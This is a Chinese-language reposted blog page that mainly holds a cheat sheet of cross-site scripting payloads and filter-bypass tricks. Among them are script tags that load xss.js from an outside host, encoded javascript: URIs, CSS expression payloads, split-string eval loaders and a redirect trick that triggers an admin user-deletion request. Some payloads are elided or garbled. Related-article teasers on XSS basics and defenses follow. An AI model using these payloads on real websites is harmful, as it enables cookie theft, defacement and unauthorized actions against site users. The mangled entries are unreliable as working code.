XSS攻击简介

XSS攻击手法汇总
最新推荐文章于 2023-12-20 17:26:29 发布
转载 最新推荐文章于 2023-12-20 17:26:29 发布 · 148 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://my.oschina.net/crazyharry/blog/1105076
文章标签:

#javascript #嵌入式 #php #ViewUI

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

普通的XSS JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

IMG标签XSS使用JavaScript命令

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

IMG标签无分号无引号

 <IMG SRC=javascript:alert(‘XSS’)>

IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

HTML编码(必须有分号)

<IMG SRC=javascript:alert(“XSS”)>

修正缺陷IMG标签

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

formCharCode标签(计算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

UTF-8的Unicode编码(计算器)

<IMG SRC=jav..省略..S')>

7位的UTF-8的Unicode编码是没有分号的(计算器)

<IMG SRC=jav..省略..S')>

十六进制编码也是没有分号(计算器)

<IMG SRC=java..省略..XSS')>

嵌入式标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>

嵌入式编码标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>

嵌入式换行符

<IMG SRC=”jav ascript:alert(‘XSS’);”>

嵌入式回车

<IMG SRC=”jav ascript:alert(‘XSS’);”>

嵌入式多行注入JavaScript,这是XSS极端的例子

<IMG SRC=”javascript:alert(‘XSS‘)”>

解决限制字符(要求同页面)

<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>

空字符12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

Spaces和meta前的IMG标签

<IMG SRC=” javascript:alert(‘XSS’);”>

Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

Non-alpha-non-digit XSS to 3

<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

双开括号

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

无结束脚本标记(仅火狐等浏览器)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

无结束脚本标记2

<SCRIPT SRC=//3w.org/XSS/xss.js>

半开的HTML/JavaScript XSS

<IMG SRC=”javascript:alert(‘XSS’)”

双开角括号

<iframe src=http://3w.org/XSS.html <

无单引号 双引号 分号

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

换码过滤的JavaScript

\”;alert(‘XSS’);//

结束Title标签

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

Input Image

<INPUT SRC=”javascript:alert(‘XSS’);”>

BODY Image

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

BODY标签

<BODY(‘XSS’)>

IMG Dynsrc

<IMG DYNSRC=”javascript:alert(‘XSS’)”>

IMG Lowsrc

<IMG LOWSRC=”javascript:alert(‘XSS’)”>

BGSOUND

<BGSOUND SRC=”javascript:alert(‘XSS’);”>

STYLE sheet

<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

远程样式表

<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

List-style-image(列表式)

<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

IMG VBscript

<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

META链接url

<META HTTP-EQUIV=”refresh” CONTENT=”0;
URL=http://;URL=javascript:alert(‘XSS’);”>

Iframe

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

Frame

<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6

Table

<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

TD

<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

DIV background-image

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

DIV background-image后加上额外字符

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

DIV expression

<DIV STYLE=”width: expression_r(alert(‘XSS’));”>

STYLE属性分拆表达

<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

匿名STYLE(组成:开角号和一个字母开头)

<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

STYLE background-image

<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
CLASS=XSS></A>

IMG STYLE方式

exppression(alert(“XSS”))’>

STYLE background

<STYLE><STYLE
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

BASE

<BASE HREF=”javascript:alert(‘XSS’);//”>

EMBED标签,你可以嵌入FLASH,其中包涵XSS

<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>

在flash中使用ActionScrpt可以混进你XSS的代码

a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);

XML namespace.HTC文件必须和你的XSS载体在一台服务器上

<HTML xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
<xss:xss>XSS</xss:xss>
</HTML>

如果过滤了你的JS你可以在图片里添加JS代码来利用

<SCRIPT SRC=””></SCRIPT>

IMG嵌入式命令,可执行任意命令

<IMG SRC=”http://www.XXX.com/a.php?a=b”>

IMG嵌入式命令(a.jpg在同服务器)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

绕符号过滤

<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>

<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>

<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>

<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>

<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>

URL绕行

<A HREF=”http://127.0.0.1/”>XSS</A>

URL编码

<A HREF=”http://3w.org”>XSS</A>

IP十进制

<A HREF=”http://3232235521″>XSS</A>

IP十六进制

<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>

IP八进制

<A HREF=”http://0300.0250.0000.0001″>XSS</A>

混合编码

<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS</A>

节省[http:]

 <A HREF=”//www.google.com/”>XSS</A>

节省[www]

 <A HREF=”http://google.com/”>XSS</A>

绝对点绝对DNS

<A HREF=”http://www.google.com./”>XSS</A>

javascript链接

<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>

转载于:https://my.oschina.net/crazyharry/blog/1105076

3.1XSS简介
wojiushilsy的博客
06-24 395
XSS简介第一种类型:反射型 XSS第二种类型:存储型 XSS第三种类型:DOM base XSS简介 跨站脚本攻击(Cross Site Script)本来缩写是CSS,但是为了与层叠样式表(Cascading Style Sheet)区分,所以在安全领域叫做 “XSS”。 XSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。在这种行为最初出现之时,所有的演示案例全是跨域行为,所以叫做 “跨站脚本” 。时至今日,随着Web 端功能的复.
XSS简介
S1lenc3的博客
11-01 164
xss又叫css,为了与前端的css区别,所以叫xss,即跨站脚本攻击XSS原理解析 XSS攻击是在网页中嵌入客户端恶意脚本代码,恶意代码一般都是javascript编写的。想要深入研究XSS,必须精通javascriptjavascript可以获取用户的cookie、改变网页内容、URL跳转,所以,存在XSS漏洞的网站,就可以盗取Cookie、黑掉页面、跳转到恶意网站。 ...
渗透之路 WEB漏洞【第七篇】XSS漏洞
dfu65065的博客
09-20 839
什么是 XSS XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。 从上面中的一段话,可以得知...
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其中的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
最新发布
04-07
PDF-XSS实例文件
XSS攻击常识及常见的XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见的XSS攻击脚本汇总
8、XSS 攻击的防御pdf资料
10-15
XSS攻击的核心在于将恶意的JavaScript代码注入到网页中,当用户浏览含有这些脚本的网页时,浏览器会执行这些代码,导致用户受到攻击XSS攻击主要发生在用户可以输入数据的地方,如微博、留言板、聊天室等。如果...
XSS介绍
MichaelJY1991的专栏
04-08 1160
安全漏洞——沉睡的巨人XSS Cross-site scripting,跨站脚本攻击,简写XSS(因为首字母缩写与CSS样式表重复,故采用XSS)。 背景 Web程序安全问题依赖于很多机制,其中就包括“同源策略”。同源策略是指调用方与被调用方需是同一地址,否则浏览器会阻止其调用。 XSS脚本攻击主要集中在web系统、其所在服务器以及相关依赖系统。利用这其中的一个漏洞,攻击者可以把恶意内容从...
xss的介绍以及概述
ranuy阮的博客
07-04 1298
**何为XSS ** 首先,xss(Cross Site Scripting)是为了不和css(Cascading Style Sheets)缩写混淆而缩写为xss,直接翻译过来就是跨站脚本。 跨站脚本攻击是常见的前端web攻击攻击者通过在页面中插入精心构造的恶意JavaScript脚本。引诱用户去点击构造的js恶意代码。当受害者去点击这些恶意代码后,游览器会去解析执行恶意的js代码。从而导致窃取用户身份/钓鱼/传播恶意代码等危害。很常见的一个xss攻击就是弹窗。 XSS的分类 反射型 储存型 DOM型
XSS详解
热门推荐
金色%夕阳的博客
07-30 1万+
XSS详解 1. 简介 2. 跨站脚本实例 3. XSS 的危害 4. 分类 4.1 反射型XSS(非持久型) 漏洞成因 攻击流程 4.2 存储型XSS(持久型) 漏洞成因 攻击流程 4.3 DOM型XSS 漏洞成因 4.4 通用型XSS 漏洞成因
XSS 基础介绍
the_biggest_baby的博客
12-20 1949
XSS, 跨站脚本漏洞,英文全称 Cross Site Script,是一种能够让黑客通过“”篡改网页,向其中插入(一般为 JS 代码),从而在用户浏览网页时,控制用户浏览器的安全威胁,也是一种类型的注入漏洞。在一开始,利用 XSS 进行攻击的演示案例是跨域的,所以叫做“跨站脚本”,不过现在 JavaScript 的功能日益强大、网站前端也愈发复杂,是否跨域也已不重要了。
XSS详细讲解
liuqinhou的博客
06-06 5109
XSS蠕虫主要发生在用户之间存在交互行为的页面中,当Web应用程序对用户输入的数据信息没有做严格的过滤时,通过结合Ajax的异步提交,就可以实现在植入恶意代码的同时,将恶意代码进行对外发送,即实现了代码的感染和传播,也就形成了XSS蠕虫。转义" &quto;即转义掉双引号,'转义掉单引号,(另一个要注意的是实际上html的属性可以不包括引号,因此严格的说我们还需要对空格进行转义,但是这样会导致渲染的时候空格数不对,因此我们不转义空格,然后再写html属性的时候全部带上引号)这样属性就不会被提前关闭了。
XSS详解(概念+靶场演示)反射型与存储型的比较与详细操作
Hala
05-04 1万+
目录 XSS(跨站脚本攻击) 1.XSS简介 1.1什么是XSS? 1.2 XSS攻击的危害包括: 2. 分类 2.1反射型 2.2存储型 3. 构造XSS脚本 3.1常用HTML标签 3.2常用javascript方法 4.反射型(四种安全级别演示) 4.4.1低安全级别 4.4.2 中安全级别 4.4.2 高安全级别 4.4.2 不可能安全级别 5.存储型(四种...
(跨脚本攻击xss简介及三种类型
qq_36760683的博客
05-21 3621
1.简介xss攻击,通常指黑客通过注入"HTML注入",来篡改网页,插入恶意的脚本,从而在用户浏览网页的时候,控制用户浏览器的一种攻击。那么什么是xss呢?看看下面的例子~~正常情况下,用户向test提交的数据会显示在页面中,例如:http://127.0.0.1/study/test.php?test=This%20is%20a%20test;http://此时查看页面源代码如图:但是如果提交一...
XSS跨站脚本攻击
weixin_30505225的博客
04-26 1291
1、简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身...
Java组件xssProtect防范XSS攻击
标题和描述中提到的知识点主要围绕着XSS攻击以及防御XSS攻击的开源Java组件。以下是对这些概念的详细解释。 ### XSS攻击知识点 #### 1. XSS攻击定义 XSS(跨站脚本攻击,Cross Site Scripting)是一种常见的网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值